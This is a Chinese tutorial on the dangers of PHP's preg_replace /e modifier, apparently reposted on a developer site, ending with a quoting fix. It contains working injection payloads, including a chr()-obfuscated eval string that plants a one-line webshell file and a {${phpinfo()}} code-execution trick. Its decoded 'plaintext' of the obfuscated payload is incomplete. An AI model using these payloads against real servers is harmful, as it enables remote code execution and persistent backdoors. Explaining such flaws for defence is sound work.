慎用preg_replace危险的/e修饰符(一句话后门常用)

前端之家收集整理的这篇文章主要介绍了慎用preg_replace危险的/e修饰符(一句话后门常用)前端之家小编觉得挺不错的,现在分享给大家,也给大家做个参考。

preg_replace函数原型:

mixed preg_replace ( mixed pattern,mixed replacement,mixed subject [,int limit])

特别说明:


/e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换完之后)。提示:要确保 replacement 构成一个合法的 PHP 代码字符串,否则 PHP 会在报告在包含 preg_replace() 的行中出现语法解析错误
举例:
代码如下:
PHP
preg_replace ("/(]*>)/e",
"\1.strtoupper(\2).\3",
$html_body);
?>
这将使输入字符串中的所有 HTML 标记变成大写。 安全威胁分析:
通常subject参数是由客户端产生的,客户端可能会构造恶意的代码,例如:
代码如下:
echo preg_replace("/test/e",$_GET["h"],"jutst test");
?>
如果我们提交?h=PHPinfo(),PHPinfo()将会被执行(使用/e修饰符,preg_replace会将 replacement 参数当作 PHP 代码执行)。
如果我们提交下面的代码会怎么样呢?
?h=eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(100).chr(97).
chr(116).chr(97).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).
chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).
chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))
密文对应的明文是:fputs(fopen(data/a.PHP,w),);
执行的结果是在/data/目录下生成一个一句话木马文件 a.PHP。 再来一个有难度的例子:
代码如下:
function test($str)
{
}
echo preg_replace("/s*[PHP](.+?)[/PHP]s*/ies",'test("\1")',$_GET["h"]);
?>
提交 ?h=[PHP]PHPinfo()[/PHP],PHPinfo()会被执行吗?
肯定不会。因为经过正则匹配后, replacement 参数变为'test("PHPinfo")',此时PHPinfo仅是被当做一个字符串参数了。
有没有办法让它执行呢?
当然有。在这里我们如果提交?h=[PHP]{${PHPinfo()}}[/PHP],PHPinfo()就会被执行。为什么呢?
PHP中,双引号里面如果包含有变量,PHP解释器会将其替换为变量解释后的结果;单引号中的变量不会被处理。
注意:双引号中的函数不会被执行和替换。 在这里我们需要通过{${}}构造出了一个特殊的变量,'test("{${PHPinfo()}}")',达到让函数被执行的效果(${PHPinfo()}会被解释执行)。
可以先做如下测试:
代码如下:
echo "{${PHPinfo()}}";
PHPinfo会被成功执行了。 如何防范这种漏洞呢?
将'test("\1")' 修改为"test('\1')",这样‘${PHPinfo()}'就会被当做一个普通的字符串处理(单引号中的变量不会被处理)。

猜你在找的PHP相关文章